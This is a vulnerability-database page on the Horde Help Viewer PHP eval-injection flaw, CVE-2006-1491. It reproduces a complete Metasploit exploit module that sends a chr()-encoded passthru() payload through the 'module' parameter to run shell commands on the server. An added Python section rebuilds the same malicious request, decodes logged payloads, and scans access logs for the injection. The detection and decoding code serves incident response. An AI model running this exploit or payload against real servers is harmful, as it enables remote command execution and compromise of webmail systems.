Horde Help Viewer Remote PHP Code Execution Vulnerability

Vulnerability ID: 1110038    Type: Code injection
Published: 2006-04-10    Updated: 2006-07-19
CVE: CVE-2006-1491    CNNVD ID: CNNVD-200603-484
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/1660
https://www.securityfocus.com/bid/17292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-484
|Vulnerability details
Horde is a PHP-based framework for building web applications. The Horde webmail application does not properly validate user-supplied input when handling requests, so a remote attacker can execute arbitrary commands on the server with the privileges of the web server process. The flaw is in the Help Viewer module (horde/services/help/index.php): a request parameter is inserted into a PHP statement that the script passes to eval(), so a remote attacker can place PHP code directly in a CGI parameter (the exploit below uses the module parameter together with show=about) and have the server execute it. Horde 3.0 through 3.0.9 and 3.1.0 are affected.
|Exploit
##
# Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
# Name: horde_help_module.pm
# License: Artistic/BSD/GPL
# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
# - This is an exploit module for the Metasploit Framework, please see
#   http://metasploit.com/projects/Framework for more information.
#
## Coded by Inkubus <inkubus@inbox.lv>

package Msf::Exploit::horde_help_module;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
	'Name'     => 'Horde help viewer module remote PHP code execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'inkubus < inkubus [at] inbox.lv >' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
			This module exploits an arbitrary PHP code execution flaw in the Horde web
		mail software. This vulnerability is only present in the "Help Viewer Module".
		Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
}),

	'Refs' =>
	  [
		['OSVDB', '15945'],
		['CVE',   '2006-1491'],
	  ],

	'Payload' =>
	  {
		'Space' => 512,
		'Keys'  => ['cmd', 'cmd_bash'],
	  },

	'Keys' => ['horde'],

	'DisclosureDate' => 'Mar 28 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $vhost          = $self->GetVar('VHOST') || $target_host;
	my $path           = $self->GetVar('RPATH');
	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

	# Add an echo on each end so the command output can be cut out of the HTML response
	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

	# Encode the command as a chain of chr() calls: the query string then carries
	# no quote characters that would break out of the string being injected into
	my $byte = join('.', map { 'chr('.$_.')' } unpack('C*', $cmd));

	# Create the GET request data. 'module' is the injected parameter; the quote and
	# semicolon framing around passthru() is what lets the injected code parse inside
	# the statement the help viewer eval()s. The commented-out line is an alternative
	# injection point via the 'template' parameter.
	#my $data = "?do=page&template={\${passthru($byte)}}";
	my $data = "?show=about&module=;\".passthru($byte);'.";

	my $req =
	  "GET $path$data HTTP/1.1\r\n".
	  "Host: $vhost:$target_port\r\n".
	  "Content-Type: application/html\r\n".
	  "Content-Length: ". length($data)."\r\n".
	  "Connection: Close\r\n".
	  "\r\n";

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending the malicious Horde request...");

	$s->Send($req);

	my $results = $s->Recv(-1, 20);
	$s->Close();

	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
		my $out = $1;
		$out =~ s/^\s+|\s+$//gs;
		if ($out) {
			$self->PrintLine('----------------------------------------');
			$self->PrintLine('');
			$self->PrintLine($out);
			$self->PrintLine('');
			$self->PrintLine('----------------------------------------');
		}
	}
	return;
}

1;

# milw0rm.com [2006-04-10]
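The module above encodes its command as a chain of chr() calls, wraps it in _cmd_beg_/_cmd_end_ markers and injects it through the module parameter. The Python below is an added example, not code from this page or from the module's author: it reproduces that request construction and marker extraction, adds the reverse step an incident responder needs (recovering the command from a chr() chain found in a log), and checks web-server access log lines for the injection. The log lines are constructed for the example; the combined-log regex, the default /horde/services/help/ path and the rule that a legitimate module value is a plain identifier (such as imp or turba) are assumptions. The Content-Type/Content-Length headers the module sends with its GET are omitted, since a GET needs neither.

```python
import re
from urllib.parse import unquote_plus, urlsplit

CMD_BEG, CMD_END = "_cmd_beg_", "_cmd_end_"


def chr_chain(cmd: str) -> str:
    """Encode each byte of cmd as a PHP chr() call joined with '.',
    the same transform as the module's unpack('C*') / join('.')."""
    return ".".join(f"chr({b})" for b in cmd.encode())


def decode_chr_chain(payload: str) -> str:
    """Incident-response side: recover the command from a logged chr() chain."""
    return bytes(int(n) for n in re.findall(r"chr\((\d+)\)", payload)).decode(errors="replace")


def build_target(path: str, cmd: str) -> str:
    """Request-target the module sends: show=about plus the injected module value."""
    wrapped = f"echo {CMD_BEG};{cmd};echo {CMD_END}"
    return path + '?show=about&module=;".passthru(' + chr_chain(wrapped) + ");'."


def build_request(path: str, cmd: str, vhost: str, port: int = 80) -> str:
    return (f"GET {build_target(path, cmd)} HTTP/1.1\r\n"
            f"Host: {vhost}:{port}\r\nConnection: Close\r\n\r\n")


MARKER_RE = re.compile(re.escape(CMD_BEG) + r"(.*)" + re.escape(CMD_END), re.S)


def extract_output(response: str):
    """Cut the command output out of the HTML response, as the module's regex does."""
    m = MARKER_RE.search(response)
    return m.group(1).strip() if m else None


# --- detection side ---------------------------------------------------------
# Assumption: a legitimate module value is a short identifier (imp, turba, ...).
MODULE_OK = re.compile(r"[A-Za-z0-9_]{1,32}")


def query_params(query: str) -> dict:
    """Split a query string on '&' only (parse_qs historically also split on ';',
    which the payload contains) and percent-decode both sides."""
    params = {}
    for pair in query.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            params[unquote_plus(k)] = unquote_plus(v)
    return params


def is_suspicious_help_request(target: str) -> bool:
    """True when a request to the help viewer carries a module value that is
    not a plain identifier; no blocklist of function names is needed."""
    parts = urlsplit(target)
    if "/services/help" not in parts.path:
        return False
    module = query_params(parts.query).get("module")
    return module is not None and MODULE_OK.fullmatch(module) is None


# Combined log format (assumption); only the client IP and request-target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: one benign about page, one injection, one benign topic page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2006:12:00:01 +0000] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 812
10.0.0.9 - - [10/Apr/2006:12:00:07 +0000] "GET /horde/services/help/?show=about&module=;%22.passthru(chr(105).chr(100));'. HTTP/1.1" 200 143
10.0.0.5 - - [10/Apr/2006:12:00:09 +0000] "GET /horde/services/help/?show=topics&module=turba HTTP/1.1" 200 2044
"""


def scan_log(text: str):
    """Return (client ip, raw module value, decoded command) for each hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m and is_suspicious_help_request(m["target"]):
            module = query_params(urlsplit(m["target"]).query)["module"]
            hits.append((m["ip"], module, decode_chr_chain(module)))
    return hits


if __name__ == "__main__":
    print(build_request("/horde/services/help/", "id", "webmail.example.com"))
    for ip, raw, cmd in scan_log(SAMPLE_LOG):
        print(f"{ip} injected module={raw!r} -> command {cmd!r}")
```

The detector keys on the shape of the module value rather than on strings like passthru or chr(, so an attacker swapping in system(), shell_exec() or a different encoding is still caught; the decoder is for triage, telling you what was actually run on a host that shows up in the hits.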
|Affected products
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
|References

Source: XF
Name: horde-help-viewer-command-execution(25516)
Link: http://xforce.iss.net/xforce/xfdb/25516
Source: BID
Name: 17292
Link: http://www.securityfocus.com/bid/17292
Source: VUPEN
Name: ADV-2006-1154
Link: http://www.frsirt.com/english/advisories/2006/1154
Source: SECTRACK
Name: 1015841
Link: http://securitytracker.com/id?1015841
Source: lists.horde.org
Link: http://lists.horde.org/archives/announce/2006/000271.html
Source: cvs.horde.org
Link: http://cvs.horde.org/diff.php?f=horde%2Fservices%2Fhelp%2Findex.php&r1=2.85&r2=2.86
Source: SUSE
Name: SUSE-SR:2006:007
Link: http://www.novell.com/linux/security/advisories/2006_07_sr.html
Source: GENTOO
Name: GLSA-200604-02
Link: http://www.gentoo.org/security/en/glsa/glsa-200604-02.xml
Source: DEBIAN
Name: DSA-1034
Link: http://www.debian.org/security/2006/dsa-1034
Source: DEBIAN
Name: DSA-1033
Link: http://www.debian.org/security/2006/dsa-1033
Source: VIM
Name: 20060330 Recent unspecified Horde vuln is eval injection
Link: http://www.attrition.org/pipermail/vim/2006-March/000671.html
Source: SECUNIA
Name: 19692
Link: http://secunia.com/advisories/19692
Source: SECUNIA